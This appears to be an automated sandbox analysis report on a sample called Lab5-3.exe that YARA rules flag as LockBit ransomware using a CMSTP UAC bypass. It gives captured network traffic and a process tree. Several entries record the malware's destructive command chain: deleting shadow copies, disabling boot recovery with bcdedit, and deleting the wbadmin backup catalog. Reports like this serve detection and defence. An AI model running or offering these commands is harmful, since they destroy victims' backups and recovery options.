                                                                                                          2024-04-26 21:39:36 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=crNMT2weYCUheMV&MD=zS4FTzTb HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Accept: */*
                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                          Host: slscr.update.microsoft.com
                                                                                                          2024-04-26 21:39:37 UTC560INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Expires: -1
                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                          ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                          MS-CorrelationId: 1248b808-7ed4-4764-a75d-829544a563ca
                                                                                                          MS-RequestId: d80dcb04-93cf-458f-8e96-c65a52bc7d1a
                                                                                                          MS-CV: c5P+Yh9hKkO/AxVN.0
                                                                                                          X-Microsoft-SLSClientCache: 2160
                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Date: Fri, 26 Apr 2024 21:39:36 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 25457
                                                                                                          2024-04-26 21:39:37 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                          Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                          2024-04-26 21:39:37 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                          Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:23:38:33
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\Lab5-3.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:149'504 bytes
                                                                                                          MD5 hash:69BEC32D50744293E85606A5E8F80425
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000000.1629021077.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.1629021077.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:1
                                                                                                          Start time:23:38:33
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:4
                                                                                                          Start time:23:38:37
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                                          Imagebase:0x7ff65aac0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:5
                                                                                                          Start time:23:38:37
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:6
                                                                                                          Start time:23:38:38
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\vssadmin.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:vssadmin delete shadows /all /quiet
                                                                                                          Imagebase:0x7ff67d280000
                                                                                                          File size:145'920 bytes
                                                                                                          MD5 hash:B58073DB8892B67A672906C9358020EC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:9
                                                                                                          Start time:23:38:39
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
                                                                                                          Imagebase:0x7ff76e190000
                                                                                                          File size:3'242'272 bytes
                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:10
                                                                                                          Start time:23:38:39
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1996,i,10208007017991637576,12589176499533245041,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                          Imagebase:0x7ff76e190000
                                                                                                          File size:3'242'272 bytes
                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:12
                                                                                                          Start time:23:38:43
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:wmic shadowcopy delete
                                                                                                          Imagebase:0x7ff693080000
                                                                                                          File size:576'000 bytes
                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:13
                                                                                                          Start time:23:38:44
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\bcdedit.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                          Imagebase:0x7ff79cca0000
                                                                                                          File size:491'864 bytes
                                                                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:14
                                                                                                          Start time:23:38:44
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\bcdedit.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:bcdedit /set {default} recoveryenabled no
                                                                                                          Imagebase:0x7ff79cca0000
                                                                                                          File size:491'864 bytes
                                                                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:15
                                                                                                          Start time:23:38:44
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\wbadmin.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:wbadmin delete catalog -quiet
                                                                                                          Imagebase:0x7ff7bff40000
                                                                                                          File size:329'728 bytes
                                                                                                          MD5 hash:F2AA55885A2C014DA99F1355F3F71E4A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:16
                                                                                                          Start time:23:38:44
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\wbengine.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\system32\wbengine.exe"
                                                                                                          Imagebase:0x7ff670b20000
                                                                                                          File size:1'585'152 bytes
                                                                                                          MD5 hash:17270A354A66590953C4AAC1CF54E507
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          Target ID:17
                                                                                                          Start time:23:38:44
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\vdsldr.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                          Imagebase:0x7ff664370000
                                                                                                          File size:27'136 bytes
                                                                                                          MD5 hash:472A05A6ADC167E9E5D2328AD98E3067
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:18
                                                                                                          Start time:23:38:44
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\vds.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\vds.exe
                                                                                                          Imagebase:0x7ff6e2af0000
                                                                                                          File size:723'968 bytes
                                                                                                          MD5 hash:0781CE7ECCD9F6318BA72CD96B5B8992
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:19
                                                                                                          Start time:23:38:47
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\Lab5-3.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:149'504 bytes
                                                                                                          MD5 hash:69BEC32D50744293E85606A5E8F80425
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000013.00000000.1764646363.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000000.1764646363.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          Has exited:true

                                                                                                          Target ID:20
                                                                                                          Start time:23:38:47
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:27
                                                                                                          Start time:23:38:52
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\Lab5-3.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:149'504 bytes
                                                                                                          MD5 hash:69BEC32D50744293E85606A5E8F80425
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 0000001B.00000000.1820658246.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000000.1820658246.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          Has exited:false

                                                                                                          Target ID:28
                                                                                                          Start time:23:38:52
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:30
                                                                                                          Start time:23:38:53
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                                          Imagebase:0x7ff65aac0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:31
                                                                                                          Start time:23:38:54
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:32
                                                                                                          Start time:23:38:54
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\vssadmin.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:vssadmin delete shadows /all /quiet
                                                                                                          Imagebase:0x7ff67d280000
                                                                                                          File size:145'920 bytes
                                                                                                          MD5 hash:B58073DB8892B67A672906C9358020EC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:34
                                                                                                          Start time:23:38:56
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\Lab5-3.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:149'504 bytes
                                                                                                          MD5 hash:69BEC32D50744293E85606A5E8F80425
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000022.00000002.1879653667.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000022.00000002.1879653667.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000022.00000000.1853803315.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000022.00000000.1853803315.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          Has exited:true

                                                                                                          Target ID:35
                                                                                                          Start time:23:38:56
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:37
                                                                                                          Start time:23:38:57
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:wmic shadowcopy delete
                                                                                                          Imagebase:0x7ff693080000
                                                                                                          File size:576'000 bytes
                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:40
                                                                                                          Start time:23:38:58
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\Lab5-3.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:149'504 bytes
                                                                                                          MD5 hash:69BEC32D50744293E85606A5E8F80425
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000028.00000002.3209902730.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.3209902730.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000028.00000000.1878107343.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000000.1878107343.000000000041B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                          Has exited:true

                                                                                                          Target ID:41
                                                                                                          Start time:23:38:58
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:42
                                                                                                          Start time:23:39:00
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\bcdedit.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                          Imagebase:0x7ff79cca0000
                                                                                                          File size:491'864 bytes
                                                                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:46
                                                                                                          Start time:23:39:01
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\bcdedit.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:bcdedit /set {default} recoveryenabled no
                                                                                                          Imagebase:0x7ff79cca0000
                                                                                                          File size:491'864 bytes
                                                                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:47
                                                                                                          Start time:23:39:01
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                                          Imagebase:0x7ff65aac0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:48
                                                                                                          Start time:23:39:01
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:49
                                                                                                          Start time:23:39:01
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\vssadmin.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:vssadmin delete shadows /all /quiet
                                                                                                          Imagebase:0x7ff67d280000
                                                                                                          File size:145'920 bytes
                                                                                                          MD5 hash:B58073DB8892B67A672906C9358020EC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:50
                                                                                                          Start time:23:39:02
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\wbadmin.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:wbadmin delete catalog -quiet
                                                                                                          Imagebase:0x7ff7bff40000
                                                                                                          File size:329'728 bytes
                                                                                                          MD5 hash:F2AA55885A2C014DA99F1355F3F71E4A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:52
                                                                                                          Start time:23:39:02
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:/c vssadmin Delete Shadows /All /Quiet
                                                                                                          Imagebase:0x7ff65aac0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:53
                                                                                                          Start time:23:39:02
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:54
                                                                                                          Start time:23:39:02
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\vssadmin.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:vssadmin Delete Shadows /All /Quiet
                                                                                                          Imagebase:0x7ff67d280000
                                                                                                          File size:145'920 bytes
                                                                                                          MD5 hash:B58073DB8892B67A672906C9358020EC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:55
                                                                                                          Start time:23:39:02
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:wmic shadowcopy delete
                                                                                                          Imagebase:0x7ff693080000
                                                                                                          File size:576'000 bytes
                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                          Has elevated privileges:true
